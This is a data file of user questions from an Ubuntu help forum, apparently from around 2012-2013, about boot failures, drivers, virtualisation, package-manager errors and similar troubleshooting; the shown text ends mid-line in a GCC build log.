279455	ubuntu boots to black screen	i installed ubuntu a couple of days back . i have an asus k3sv laptop ( nvidia optimus sigh ) and im triple booting ubuntu , fedora and windows . now when im booting ubuntu , during the boot process the screen turns off and nothing happens . its not just a black screen , the screen is basically off , and the processor led also stops blinking . i tried booting it using the parameters a number of other posts suggest , replacing quiet splash with verbose nomodset . during the display of all the messages , ubuntu halts only for a couple of seconds to display 'over-current condition on port 3 ' and 'over-current condition on port 4' it only lasts a couple of second after which it zooms past a couple of messages and the screen turns off . the last few messages , are a couple of 'ahc1 ' and two messages of 'sata ... ' and the a couple of 'dummy' fedora and windows works fine , just mentioning it .
279457	how do i prevent ubuntu 12.04 from locking , when using win7 in virtualbox ?	i use ubuntu 12.04 plus windows 7 from virtualbox . the thing is that , when i am in windows `` too long '' ( longer than the time after which ubuntu normally locks ) , ubuntu locks . it 's not expected , because i still use pc . i would only like to lock it , when i do n't use mouse/ keyboard at all . conclusion is that probably , when the focus is in windows , ubuntu does n't know about that ( does n't have info on keyboard/ mouse moves ) . has anyone else experienced similar issue ? is there a way to prevent it ? many thanks in advance , konrad after edit : - guest additions are installed for windows 7 , - i do n't use unity - i do n't use compiz - to clarify : locking occurs , when i go back to ubuntu from windows , after that time
279458	cant connect to internet with ubuntu 12.10	i 'm having a problem connecting to internet on ubuntu 12.10 ( just installed after giving up with 12.04 issues with graphics card ) with a wireless and with a wired connection . i have looked into solving this problem myself but after much trouble and frustration i could use some help . to my understanding i believe its because i have an ar8161 ethernet controller and do n't have the proper driver packages . this is where i 'm having trouble , i do n't know which packages to install or how to . i tried the download links people posted for people with a very similar issue . either they do n't work or i 'm not installing them right . the way i tried to install them was i downloaded them on this computer and used a usb drive ( key ? ) to transfer to the laptop without the internet connection and then opened them with the ubuntu software center which led me to an error every time . any help will be greatly appreciated and any information you need from me i will post . thanks
279459	virtualbox - error not suplibosinit	i update ubuntu 12.10 with kernel 3.5.0-27 today march 9 2013 ( i had the past kernel 3.5.0-25 ) . but not i cant use virtualbox 4.2.10-84104 , appears me this erre message : virtualbox error details code result : ns_error_failure ( 0x80004005 ) componente : machine interfaz : imachine { 22781af3-1c96-4126-9edf-67a020e0e858 } and another window that say : the virtualbox linux kernel driver ( vboxdrv ) is either not loaded or there is a permission problem with /dev/vboxdrv . please reinstall the kernel module by executing '/etc/init.d/vboxdrv setup' as root . if it is available in your distribution , you should install the dkms package first . this package keeps track of linux kernel changes and recompiles the vboxdrv kernel module if necessary . i run these commands in the terminal : sudo apt-get install dkms and done dkms is already the newest version but with the next command , appears me sudo /etc/init.d/vboxdrv setup error ! your kernel headers for kernel 3.5.0-27-generic can not be found . please install the linux-headers-3.5.0-27-generic package , or use the -- kernelsourcedir option to tell dkms where it 's located failed , trying without dkms recompiling virtualbox kernel modules look at /var/log/vbox-install.log to find out what went wrong what can i do ? ? ? thank you very much in advance the answer
279462	hardware requirements	iâ´ve got an old notebook ( hp pavilon ) from 2003 . it has centrino 1,5 ghz , 512 mb ram and 60 gb hd and 64mb nvidia grafic chip . is this enough to install latest ubuntu ?
279466	wireless not visible in dell vostro 2520 , in ubuntu 12.10 ?	i have executed the following commands : sudo apt-get install firmware-b43-installer sudo apt-get remove bcmwl-kernel-source when i run lspci , i found `` broadcom '' as `` bcm43142 chip '' . i downloaded wireless-bcm43142-dkms_6.20.55.19-1_amd64.deb and attempted to install it with : sudo dpkg -i wire*.deb i am getting an error that b43 module does not exist in /proc/modules etc ... what should i do ?
279467	what is the best way to try ubuntu out ?	a friend of mine loves ubuntu with gnome , but does n't want to install it ( yet ) and does n't want to use wubi . when i used unetbootin to put an ubuntu iso on his 2gb usb stick , it worked , but it did n't save anything .
279468	error booting full ubuntu from external usb hard drive on desktop preloaded with windows 8	i 've just installed linux for the first time , except i installed it on a seagate usb hard drive ( 500gb , usb 3.0 , 3 partitions : 10 gb ubuntu/1gb swap/the rest ntfs ) from a live usb drive ( 4gb ) made in pendrivelinux . it boots perfectly on a 6/7 year old toshiba satellite a100 ( 32 bit celeron dual core 1.6ghz , 1.5gb ram . xp on 60gb internal hdd , ) a year old netbook ( acer aspire one 722 with windows 7 on internal 320 gb hdd , 2gb ram and 1ghz dual core amd processor ) and an hp probook ( 2nd generation i3 quad core 2.3 ghz , 4gb ram , windows 7 on internal 500gb hdd ) but wo n't boot on my 6 month old desktop ( compaq , 64 bit 2.3ghz pentium dual core , 4gb ram , windows 8 on 500gb partition of 1tb hdd . ) neither computer has usb 3.0 ports . all i get is a message saying `` error loading operating system '' after choosing the usb hdd in the bios menu . i can run gparted off a usb stick on both computers no problem . i 've tried with both ubuntu 12.10 & 13.04 beta ( i know its not supported here yet , but the problem is in the current version too ) but nothing changed . any ideas on how to fix this ?
279476	project applications auto opener positioner	i work with different tools that i need to open each time i open my laptop depending on the project i 'm going to work on . i 'd like to have a way to automate the opening and positioning of all applications for a given project . for example let 's imagine i need to open these windows : gedit maximized nautilus opened on working directory , top right positioned terminal opened on working directory , left right positioned firefox maximized opened with a specific url is there some software that could help me to automate that applications opening/positioning ? or maybe a little shell script that could do all that stuff .
279477	time incorrect on ubuntu and takes a long time to update	iḿ really satisfied with ubuntu , but for job necessities i need windows too . the problem for me appears when i change from ubuntu to windows7 , the time is incorrect and take a lot of time to adjust itself using internet services . related with the time : iĺl try to explain myself : i am using linux , but meanwhile i need to use windows and i restart the system to boot into windows . thereś no problem with this , but the time is incorrect . that is : when i am using linux , the time is correct , but if i restart to use windows , windows time is incorrect
279483	ubuntu sdk for x86 tablets	i was thinking about installing the regular ubuntu on a windows 8 tablet with x86 processor ... so basically a tablet that is actually a pc . i want to make a program that supports all gestures and movement detection of a tablet . windows 8 has full support on a variety of different programming languages and supports all mobile device sensors in its sdk . i am not sure about ubuntu . so my question is : is there a ubuntu sdk that supports all features of a x86 tablet ? i am not interested in arm tablets . thx for answering !
279484	ubuntu doesnt shutdown properly with intel hd vga ( proprietary driver )	i 'm using ubuntu 12.04 on a dell vostro 3550 notebook with a amd radeon 6630m/intel hd 3000 hybrid-graphics card . i recently installed the latest proprietary drivers from the amd website . everything runs fine but i have one problem : i 'd like to use the intel vga-chip but when i choose it in the amd driver software , the system is not shutting down properly . it is stuck at `` system will now halt '' . the fans turn off for a second and then go on again . this doesnt happen when i activate the 6630 vga-device . then it shuts down fine . any suggestions ?
279485	wubi does n't work with 32 bit windows	well as the title says i ca n't use wubi with 32 bit windows , it produces an error . is there any fix ?
279488	window manager wo n't boot using nvidia gpu on eeepc1015pn with ubuntu 12.10	i 'm using ubuntu 12.10 on an asus eeepc 1015pn . this netbook has an nvidia ion gpu , which i had to install mtrons scripts in order to use ( located here : https : //sites.google.com/site/mtrons/howtos/eeepc-1015pn ) . these worked great at first and i much prefer the nvidia mode for steam and minecraft and other gaming . however today i tested out the intel mode and it also works great . but i restarted in order to go back to the nvidia mode and it does n't boot to the window manager , instead it just drops me into tty1 . the only way i can get to a gui is by using the intel mode and now i 'm basically stuck in intel mode . i tried restarting many times and also have tried the commands from mtron 's script such as sudo display-settings auto and sudo display_settings fix and also sudo display-settings config-nvidia . none of those worked . i ca n't seem to get to the gui . i would appreciate some advice if anyone has encountered this problem . thank you very much .
279489	internet connection working only on home wifi	i 'm having serious problem with my wifi connection , respectively with the internet connection . my laptop is lenovo edge e 530 3259-4dg . i 'm able to connect to any wifi , but then the internet connection is not working . on my wifi at home ( where i installed the kubuntu 12.04 64bit ) , the internet connection is fine . as a summary , i 'm able to connect to other wifis and always get the ip address , but then the internet connection is not working then . i tried four different wifi routers and had always the same issue . i have no idea how to solve it . does it has anything to do with the rights ? thank you very much for any suggestion . martin
279491	touchpad/trackpad is not found by ubuntu 12.10 but external usb mouse works	i 've just attempted a reinstall of ubuntu 12.10 , which has resulted in my issue of the trackpad not working . i 've run sudo apt-get update & & sudo apt-get upgrade , but still to no avail . here is the output of xinput list : ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ usb optical mouse id=9 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ sleep button id=8 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=10 [ slave keyboard ( 3 ) ] as you can see , x has recognised my external usb mouse but not my touchpad . how can i get it to detect the trackpad ? i 'm using a lenovo thinkpad x220t , with quantal 12.10 64bit , kernel linux 3.5.0-26-generic and gnome 3.6.0 .
279492	error installing apache2 server	i 'm trying to install apache2 server , but it gives following error message : it looks like you 've deleted /etc/apache2/mods-available/cgid.load , so mod_cgid can not be enabled . to fix this , please purge and reinstall apache2.2-common . setting up apache2 ( 2.2.17-1ubuntu1.5 ) ... i 've done the same using ubuntu software center , but getting the same error again .
279493	how to check an encrypted disk for errors	during the last installation of ubuntu i set up full disk encryption using the option on the installer . my disk seems to now have become corrupt , and i 'd like to check it for errors . gnome disks on ubuntu 12.10 does n't seem to be able to handle encrypted partitions yet ( and nautilus sees the disk also , but fails to mount it ) , so i 'm looking for a way to do it on the command line . how can i unlock my encrypted partition and check the filesystem within for errors ?
279496	how to disable print screen shortcut	in my keyboard the print screen key is very close to the backspace key , and whenever i want to press backspace , instead it takes a screenshot . how can i disable the print screen shortcut ?
279498	ubuntu consistenly restarts at gui interaction	i am using ubuntu 12.04 lts and gnome . i recently swapped out my amd gfx card for an nvidia card and then back again . in the process i have ended up here - a rebooting system . i have thus far used aticonfig -- intial to recreate xorg.conf i have also tried different fglrx drivers , but to no avail . heading into recovery mode and then using failsafex , gives me an error : fatal server error : no screens found the failsafe log file repeats the above mentioned erro along with screens found , but none have a usable confirguration i would love to post more info , but i ca n't access that system long enough . please let me know what further info will help . any suggestions greatly appreciated ! ** edit : installing drivers from amd website improved the situation .
279505	ubuntu server 12.04 use apt-get to update but error	unpacking linux-image-3.2.0-40-generic ( from ... /linux-image-3.2.0-40-generic_3.2.0-40.64_amd64.deb ) ... done . dpkg-deb ( subprocess ) : data : internal bzip2 read error : 'data_error' dpkg-deb : error : subprocess < decompress > returned error exit status 2 dpkg : error processing /var/cache/apt/archives/linux-image-3.2.0-40-generic_3.2.0-40.64_amd64.deb ( -- unpack ) : short read on buffer copy for backend dpkg-deb during `./lib/modules/3.2.0-40-generic/kernel/drivers/gpu/drm/nouveau/nouveau.ko' examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.2.0-40-generic /boot/vmlinuz-3.2.0-40-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.2.0-40-generic /boot/vmlinuz-3.2.0-40-generic errors were encountered while processing : /var/cache/apt/archives/linux-image-3.2.0-40-generic_3.2.0-40.64_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i use apt-get clean 4~6 times , but still fails in system update . does anyone help me to pass this issue ?
279508	what is the recomended application set for qa/tester 's suite in ubuntu ?	i work in sqa as test manager/tester and i want to get more from my ubuntu desktop . unfortunately ubuntu does not have much software in repository for this task . can you recommend set of linux applications a software tester should have and eventually how to install it ?
279509	how can i install gstreamer 1.0 in ubuntu 12.04 ?	i 'm trying to install gstreamer 1.0 on ubuntu 12.04 , the default gstreamer that comes with ubuntu 12.04 is gst 0.10 . i could see that i could download the gstreamer 1.0 source from gstreamer.freedesktop.org , build it and install it . but this installs only the gst plugins only , it does not install the actual required libraries like : mpeg2dec , h264 , and other dependent libraries . these libraries are required by the gst plugins .
279511	how to shrink an ext4 /home partition without using a livecd and losing data ?	i need to shrink an ext4 /home partition ( /dev/sda9 ) to make space for something else . i would prefer avoid live cds ( boot troubles with new efi and . i do n't have a cd/usb in hand in the office ) . i can boot as root directly to command line so i can unmount /home but then , for some reasons , i ca n't use the gui even for the root user , so i ca n't use gparted . is there a terminal command to resize an unmounted ext4 partition without losing data ?
279519	unable to shut down ubuntu 11.10	i am using ubuntu 11.10 and i am unable to shutdown via shutdown option . if i issue a shutdown the system goes back to the login prompt . i can shutdown the system only via terminal using sudo shutdown -h now . let me know how to resolve this issue .
279522	how to enter a folder with name # from the command line in ubuntu ?	i have a folder , name of my folder is # . how can i change directory ( cd ) to this folder .
279526	moving lubuntu boot disk to an sd card - grub says no such device	i have a bit of an unusual problem . i 've installed lubuntu 12.10 amd64 on my system , placing / and /boot on an ssd and the rest on a hard disk . everything except /boot is encrypted . all was well until the ssd started producing i/o errors . it appears i 'm going to have to return it for replacement , which means being without it for a few weeks . as a substitute i copied everything from / and /boot onto an sd card , installed grub on it ( grub-install /dev/sdf ) , and figured i could use the sd card as my boot disk until the replacement ssd arrives . however , grub does n't seem to agree - once the ssd is disconnected and the system powered on again , grub boots from the sd card , but only says : error : no such device : 5ab2e581-some-guid . grub rescue > i do n't recognize that guid it 's complaining about - it 's not in grub.cfg , grubenv , or any other text files i found in /boot , and sudo blkid does n't show it . piecing together what information i could find about this prompt i came up with the following set of commands that seemed like they should be able to boot the kernel manually from here : set root= ( hd0 , msdos1 ) /boot set prefix= ( hd0 , msdos1 ) /boot/grub insmod linux linux ( hd0 , msdos1 ) /boot/vmlinuz-3.5.0-26-generic root=/dev/sde1 rootdelay=5 boot but the kernel does n't seem to notice the sd card , and fails saying i need to provide an appropriate root= parameter and giving a list of available partitions - except the list is empty . if , on the other hand , i do : set root= ( hd0 , msdos1 ) /boot set prefix= ( hd0 , msdos1 ) /boot/grub insmod linux linux ( hd0 , msdos1 ) /boot/vmlinuz-3.5.0-26-generic initrd ( hd0 , msdos1 ) /boot/initrd.img-3.5.0-26-generic boot it boots into an initrd image where i can see my sd card ( on /dev/sde1 , not /dev/sdf1 , which is where i got sde1 in the above commands ) , but it does n't appear there 's any way to boot it from here either . i do n't know what i 've missed here - what is this unknown guid grub is looking for , and why is n't it able to find and boot the kernel on the sd card ?
279527	grub `` quiet splash '' + linux-image-3.2.0-40-generic + full disk encryption = boot failure	from this morning the boot process on my laptop is no longer working . the only relevant change from yesterday ( when all was working fine ) has been a kernel update ( from 3.2.0-39-generic to 3.2.0-40-generic ) . when grub tries to boot the 3.2.0-40-generic kernel , i get only a black screen ( the screen seems powered off ) . after many tries and googling around , i found the following : if i change the cmdline_linux_default grub parameter ( inside /etc/default/grub ) from the default value `` quiet splash '' to `` nomodeset '' the boot process works but the screen has a lower resolution than before ( from 1600x900 to 800x600 ) . this is not happening with the previous kernel version ( 3.2.0-39-generic ) . even with `` quiet splash '' enabled , all is working fine with the correct resolution . an important note : my disk is fully encrypted ( actually the setup is lvm + encryption ) . so when the boot works fine , after the grub selection screen i am asked to insert the passphrase for decrypting the whole file system . is there a way to fix this misbehaviour ? i would like to avoid workarounds like using always an old kernel or using `` nomodeset '' as a default parameter . thank you in advance
279530	laptop display turns off & hdmi does n't work when plugging the hdmi cable in ( asus zenbook ux31e )	i 've been using my zenbook 's hdmi port for watching movies on my tv a bit . everything worked fine , until i wanted to turn off my screen whenever the hdmi cable was plugged in . i did this in the settings under screens menu . there is an option to turn the laptop screen off every time an hdmi cable is plugged in . the problem is , the hdmi output does n't seem to work anymore ( no signal on my tv 's hdmi channel ) and when i unplug the cable the screen still does n't turn on , so i have no choice but shut down my laptop completely by pressing the physical power button .
279535	vmware shared folders not working , vmware-tools issue ?	i 'm having trouble getting vmware to enable shared folders between the host and vm as every time i try to enable it , i get the following error dialog : vmware player unable to update run-time folder sharing status : unknown error . i 'm running ubuntu 12.04 on the vm . i 've read that it is likely a vmware tools issue , but i 've reinstalled countless times now as root , guest , my account , and still no luck . i ensured that i had done apt-get on the prerequisites of gcc , build-essentials and such , but still to no avail . a couple of times after reinstalling vmwaretools the error dialog did not appear , but even when a shared folder was added it did not appear in the /mnt/hgfs/ directory . any help would be greatly appreciated as to potential causes/solutions .
279543	unmet dependencies : not configured yet	linux-image-server depends on linux-image-3.2.0-39-generic ; however : package linux-image-3.2.0-39-generic is not installed . dpkg : error processing linux-image-server ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . dpkg : dependency problems prevent configuration of linux-server : linux-server depends on linux-image-server ( = 3.2.0.39.47 ) ; however : package linux-image-server is not configured yet . linux-server depends on linux-headers-server ( = 3.2.0.39.47 ) ; however : version of linux-headers-server on system is 3.2.0.40.48. dpkg : error processing linux-server ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : linux-image-server linux-server e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i do n't know how to fix this issue . plz help me . > <
279545	texturepacker alternative ?	is there any sprite sheets editor like texturepacker ? i have been searching a lot on the web but i did not find a similar/equivalent tools .
279551	shell script runs fine by itself , but not in cron	i have a shell script that runs nmap on an address , and i want to have it do it daily for me . so i added a reference to it in my crontab . unfortunately , for some reason it does n't recognize the arguments i 'm sending to nmap . while it runs fine when i run it explicitly , it errors in cron on the first argument . cron entry : 0 3 * * * /home/directedition/observatory/nmapscan.sh # job_id_1 script : # ! /bin/bash today= $ ( date + '' % y- % m- % d '' ) tempfilename=/home/directedition/observatory/scan- $ today.temp.xml filename=/home/directedition/observatory/scan- $ today.xml touch $ tempfilename chmod 640 $ tempfilename /usr/bin/nmap -a -t5 -o -v -ox $ tempfilename 10.10.1.0-255 > /home/directedition/observatory/nmapoutput.txt chown directedition $ tempfilename chmod 644 $ tempfilename mv $ tempfilename $ filename error : nmap : invalid option -- 'a' i can shuffle the arguments around , and whichever i put first will invariably error .
279557	rsync : connection timed out	i am not able to list drectories through rsync : from host2 : user @ host2 # sudo rsync user @ host1 : :share rsync : failed to connect to host1 : connection timed out ( 110 ) rsync error : error in socket io ( code 10 ) at clientserver.c ( 122 ) [ receiver=3.0.7 ] it does not show rsync as a service user @ host2 # nmap host1_ip // ( ip of host1 ) port state service 20/tcp closed ftp-data 21/tcp open ftp 22/tcp open ssh 23/tcp open telnet 25/tcp open smtp 53/tcp open domain 80/tcp open http 81/tcp closed hosts2-ns 110/tcp open pop3 143/tcp open imap 443/tcp open https 465/tcp closed smtps 587/tcp open submission 783/tcp closed spamassassin 990/tcp closed ftps 993/tcp closed imaps 995/tcp closed pop3s 3306/tcp open mysql 7025/tcp closed unknown 8080/tcp open http-proxy 8081/tcp closed blackice-icecap 10000/tcp closed snet-sensor-mgmt could rsync be hidden behind a firewall ?
279558	how to see/list history of all wiki contributions/edits by an author/user in wiki.ubuntu.com ( moinmoin ? )	i have logged in some time ago in wiki.ubuntu.com , making some edits . now i have logged in again ( always via my launchpad id ) - and when i click on my username , all i get is some preferences , as described in here . if you click on info on the main page , ( i guess that is like `` view history '' in mediawiki ) ; you can see that the users are linked either via their launchpad homepage ( which i actually expected ) , or by their email . but then - you can not call up a history list of ubuntu wiki edits on the launchpad page ! ? in mediawiki , one can simply append wiki/special : contributions/username to the wiki url , and get all user 's contributions ... so how on earth could i find the same information for myself in the ubuntu wiki ?
279559	how to install ubuntu for tablets on lenovo thinkpad x60/x200/x220/x230 tablet ?	how to install ubuntu for tablets ( or unity for tablets ? ) on lenovo thinkpad tablet ( the x series ? ) which package from which repository to install on top of standard ubuntu to get ubuntu for tablets working ? best regards hg
279560	unable to recover admin account ubuntu 11.10	i had accidentally deleted the admin account . i am using the system from standard how to recover the administrator account which i had deleted , please do favour me in resolving this isssue .
279568	mysql very slow on ( fast ) development laptop	[ solved ] ubuntu 12.10 x64 new i7 laptop , mysql default installation . importing a 6 mb dump file ( a empty drupal dump made mostly of insert into statements ) takes ~30 minutes , on other pc takes less than a minute . i created an ext3 partition and monted /var/lib/mysql there , but it did n't solve the problem . iostat -x : linux 3.5.0-27-generic ( lobiancoofficelinux ) 09/04/2013 _x86_64_ ( 8 cpu ) avg-cpu : % user % nice % system % iowait % steal % idle 2,44 0,01 0,49 2,44 0,00 94,62 device : rrqm/s wrqm/s r/s w/s rkb/s wkb/s avgrq-sz avgqu-sz await r_await w_await svctm % util sda 34,47 68,87 9,86 31,42 388,97 420,90 39,24 1,51 36,56 37,10 36,39 9,65 39,85 what else could it be to give mysql such a slow performance ? i do n't know if it 's related , but also opening the dump.sql file with gedit or kate is pretty slow..
279570	unable to securely remove : upgrade about libssl-doc	the following packages will be removed : libssl-doc the following packages have been kept back : nodejs nodejs-dev 0 upgraded , 0 newly installed , 1 to remove and 2 not upgraded . 1 not fully installed or removed . after this operation , 1459 kb disk space will be freed . ( reading database ... 27911 files and directories currently installed . ) removing libssl-doc ... dpkg : error processing libssl-doc ( -- remove ) : unable to securely remove '/usr/share/man/man3/ssl_set_session_id_context.3ssl.gz.dpkg-new ' : no such file or directory no apport report written because the error message indicates an issue on the local system errors were encountered while processing : libssl-doc e : sub-process /usr/bin/dpkg returned an error code ( 1 ) while useing apt-get upgrade i got this error message ? i want to fix it but do n't know how to do . does anyone know could help me to pass this issue ? > <
279571	ca n't get second gpu recognized	i just stuck in another gpu to run two screens . $ lspci | grep vga 02:00.0 vga compatible controller : nvidia corporation g86 [ geforce 8500 gt ] ( rev a1 ) 03:00.0 vga compatible controller : nvidia corporation gt218 [ geforce 210 ] ( rev a2 ) but running xrandr i only see the first one : $ xrandr screen 0 : minimum 8 x 8 , current 1920 x 1200 , maximum 8192 x 8192 dvi-i-0 disconnected ( normal left inverted right x axis y axis ) vga-0 disconnected ( normal left inverted right x axis y axis ) tv-0 disconnected ( normal left inverted right x axis y axis ) dvi-i-1 connected 1920x1200+0+0 ( normal left inverted right x axis y axis ) 518mm x 324mm 1920x1200 60.0*+ 1680x1050 60.0 1600x1200 60.0 1440x900 75.0 59.9 1280x1024 75.0 60.0 1280x800 74.9 59.8 1024x768 75.0 60.0 800x600 75.0 60.3 640x480 75.0 59.9 and running gksudo nvidia-settings i only see the one gpu . i found something about enabling two gpus in the nvidia drivers so i tried this : $ sudo nvidia-xconfig -a using x configuration file : `` /etc/x11/xorg.conf '' . nvidia : could not open the device file /dev/nvidia1 ( input/output error ) . warning : unable to use the nvidia-cfg library to query nvidia hardware . error : unable to determine number of gpus in system ; can not honor ' -- enable-all-gpus ' option . backed up file '/etc/x11/xorg.conf ' as '/etc/x11/xorg.conf.backup' new x configuration file written to '/etc/x11/xorg.conf' any help highly appreciated !
279582	usb hdd not visible in nautilus/nemo	the hdd is visible in the 'disks ' utility . i can mount the one and only partition on that drive using mount . gvfs-mount recognizes the disk : $ gvfs-mount -- list ... drive ( 2 ) : 750 gb hard disk type : gproxydrive ( gproxyvolumemonitorudisks2 ) dmesg looks like this : [ 25081.614627 ] usb 2-6 : new high-speed usb device number 11 using ehci_hcd [ 25081.747814 ] usb 2-6 : new usb device found , idvendor=125f , idproduct=a93a [ 25081.747826 ] usb 2-6 : new usb device strings : mfr=1 , product=3 , serialnumber=2 [ 25081.747834 ] usb 2-6 : product : portable hdd sh93 [ 25081.747840 ] usb 2-6 : manufacturer : adata [ 25081.747846 ] usb 2-6 : serialnumber : 000000000078 [ 25081.748425 ] scsi15 : usb-storage 2-6:1.0 [ 25082.744264 ] scsi 15:0:0:0 : direct-access adata hdd sh93 pq : 0 ansi : 0 [ 25082.746361 ] sd 15:0:0:0 : attached scsi generic sg2 type 0 [ 25082.749729 ] sd 15:0:0:0 : [ sdc ] 1465149168 512-byte logical blocks : ( 750 gb/698 gib ) [ 25082.751350 ] sd 15:0:0:0 : [ sdc ] write protect is off [ 25082.751365 ] sd 15:0:0:0 : [ sdc ] mode sense : 03 00 00 00 [ 25082.751826 ] sd 15:0:0:0 : [ sdc ] no caching mode page present [ 25082.751834 ] sd 15:0:0:0 : [ sdc ] assuming drive cache : write through [ 25082.754559 ] sd 15:0:0:0 : [ sdc ] no caching mode page present [ 25082.754561 ] sd 15:0:0:0 : [ sdc ] assuming drive cache : write through [ 25082.783022 ] sdc : sdc1 [ 25082.785984 ] sd 15:0:0:0 : [ sdc ] no caching mode page present [ 25082.785995 ] sd 15:0:0:0 : [ sdc ] assuming drive cache : write through [ 25082.786002 ] sd 15:0:0:0 : [ sdc ] attached scsi disk the disk is n't visible in nautilus ' `` devices '' category . other usb disks are visible and i can mount them with nautilus . that particular drive used to work with nautilus two months ago . the only partition on that disk is formatted with vfat . i tried rebooting and it has n't helped . edit : the drive is also invisible in dolphin , so there seems to be some underlying issue .
279584	suspend/resume failure	i have been getting this occasionally since i started using ubuntu . does anyone know a fix ?
279585	trouble accessing www folders - permission or ownership ?	trying to access a folder inside /var/www with : cd layout i get the following response : bash : cd : layout : permission denied when i list the details , i get : drwxrw -- -- 7 www-data www-data 4096 apr 9 15:21 layout i 've not seen this www-data before - what is it and how do i correct it ? edit ( more info ) : i can access these files with root through nautilus .
279586	accessing wireless net	wireless network missing on my system i installed ubuntu 12.04 and windows & in parallel . if i use win7 i can access my wireless router but when i use ubuntu i can `` see '' all my neighbors router but not mine ! ! ! can someone help me ? thank you in advance ! fusibiu
279587	apt-get install - - fix-broken killed everything	ubuntu 12.04 after an update , i got a red warning icon in the system tray saying something about dependency issues due to : error : broken count > 0 . i googled it and found the following thread : broken package after update : linux-headers , error broken count > 0 the guy there had the same issue and he could fix it using the command : sudo apt-get install -- fix-broken so i did the same without thinking too much and the result was that seemingly every last program was removed from the system . then i restarted my machine ( quite stupid ) and now i do n't even get to the login screen . is there anything i can do besides reinstalling ubuntu ?
279590	installing packages remotely via bash script in ubuntu	i am trying to install firefox packages to all my linux hosts remotely using a bash script . but when ever i execute the script i get the following error . how do i enable display in bash script ? error : no protocol specified error : can not open display : :0.0 no protocol specified error : can not open display : :0.0
279593	install git on ubuntu with lamp	i have ubuntu 12.10 on my server and i need lamp on it , i want to use git on it - which i 'm new to - ... so i 've read this article about how to install git , it says that i should have public ssh key on my machine .. it looks need ssh server like openssh server , now i ask : does openssh make any compatibility problems with lamp ? ? if i 'm wrong with something , i want to know how to install remote git repository on a local server - without internet - .
279595	can not access jump drives	to whom it may concern : for two months now i have not been able to get to the photos and files on my jump drives when i need to use them for various reasons . at the same time this started i also lost the bar at the bottom of the page that contained my minimized software . when i minimize , the software is lost to me until i shut down and restart . as such , i am simply making the window smaller and hiding widows on the page behind other windows so as to not lose anything i 'll need later . can anyone help me ? thanks , tom m .
279596	does hadoop only run on ( ubuntu ) linux server os or i can run it on desktop ?	does hadoop only run on ( ubuntu ) linux server os or i can run it on desktop ? sorry for this silly question but i am a little confused about it . as i am trying to run hadoop on my system and i do n't want to use cloudera or mapr versions of that .
279600	turning computer on log ?	is there a way to find out when my computer was turned on even if user was not successful on logging in ?
279603	building gcc 4.8 on ubuntu 12.04	i am trying to install gcc 4.8 on ubuntu 12.04 , but during make i get the error shown below where compilation aborts . ( to the best of my knowledge i have all prerequisites satisfied as i have already gcc 4.7.2 compiled , installed and running on my system . i manage different versions of gcc using package manager 'stow ' . ) does anybody have a solution or a clue to a solution , please ? $ ./configure -- prefix /usr/local/stow/gcc-4.8.0 ... $ make [ -f stage_final ] || echo stage3 > stage_final make [ 1 ] : entering directory `/home/me/downloads/gcc-4.8.0' make [ 2 ] : entering directory `/home/me/downloads/gcc-4.8.0' make [ 3 ] : entering directory `/home/me/downloads/gcc-4.8.0' rm -f stage_current make [ 3 ] : leaving directory `/home/me/downloads/gcc-4.8.0' make [ 2 ] : leaving directory `/home/me/downloads/gcc-4.8.0' make [ 2 ] : entering directory `/home/me/downloads/gcc-4.8.0' make [ 3 ] : entering directory `/home/me/downloads/gcc-4.8.0/host-i686-pc-linux-gnu/libiberty' if [ x '' -fpic '' ! = x ] & & [ ! -d pic ] ; then \ mkdir pic ; \ else true ; fi touch stamp-picdir config_files= config_headers=config.h : ../.././libiberty/config.in /bin/bash ./config.status config.status : creating config.h config.status : executing default commands if [ x '' -fpic '' ! = x ] ; then \ gcc -c -dhave_config_h -g -i . -i../.././libiberty/../include -w -wall -wwrite-strings -wc++-compat -wstrict-prototypes -pedantic -fpic ../.././libiberty/regex.c -o pic/regex.o ; \ else true ; fi in file included from ../.././libiberty/regex.c:52:0 : /usr/include/i386-linux-gnu/sys/types.h:99:17 : error : two or more data types in declaration specifiers /usr/include/i386-linux-gnu/sys/types.h:110:19 : error : two or more data types in declaration specifiers ../.././libiberty/regex.c:132:1 : warning : function declaration isn’t a prototype [ -wstrict-prototypes ] ../.././libiberty/regex.c:132:7 : warning : conflicting types for built-in function ‘malloc’ [ enabled by default ] ../.././libiberty/regex.c:133:1 : warning : function declaration isn’t a prototype [ -wstrict-prototypes ] ../.././libiberty/regex.c:133:7 : warning : conflicting types for built-in function ‘realloc’ [ enabled by default ] in file included from ../.././libiberty/regex.c:640:0 : ../.././libiberty/regex.c : in function ‘byte_regex_compile’ : ../.././libiberty/regex.c:2441:7 : warning : implicit declaration of function ‘free’ [ -wimplicit-function-declaration ] ../.././libiberty/regex.c:2441:33 : warning : incompatible implicit declaration of built-in function ‘free’ [ enabled by default ] ../.././libiberty/regex.c:2502:17 : warning : incompatible implicit declaration of built-in function ‘free’ [ enabled by default ] ../.././libiberty/regex.c:2535:36 : warning : incompatible implicit declaration of built-in function ‘free’ [ enabled by default ] ../.././libiberty/regex.c:2642:28 : warning : incompatible implicit declaration of built-in function ‘free’ [ enabled by default ] ../.././libiberty/regex.c:3645:26 : warning : incompatible implicit declaration of built-in function ‘free’ [ enabled by default ] ../.././libiberty/regex.c:4152:5 : warning : incompatible implicit declaration of built-in function ‘free’ [ enabled by default ] ../.././libiberty/regex.c : in function ‘byte_re_compile_fastmap’ : ../.././libiberty/regex.c:4837:11 : warning : implicit declaration of function ‘abort’ [ -wimplicit-function-declaration ] ../.././libiberty/regex.c:4837:11 : warning : incompatible implicit declaration of built-in function ‘abort’ [ enabled by default ] ../.././libiberty/regex.c : in function 